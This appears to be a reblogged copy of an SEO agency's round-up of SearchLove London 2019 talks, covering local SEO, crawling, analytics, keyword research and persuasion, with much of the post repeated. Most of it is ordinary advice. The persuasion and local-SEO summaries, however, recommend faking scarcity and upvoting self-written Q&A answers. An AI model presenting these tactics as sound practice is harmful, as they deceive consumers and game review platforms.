Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
from Digital Marketing https://www.distilled.net/resources/searchlove-london-2019-round-up/ via http://www.rssmix.com/
0 notes
dillenwaeraa · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
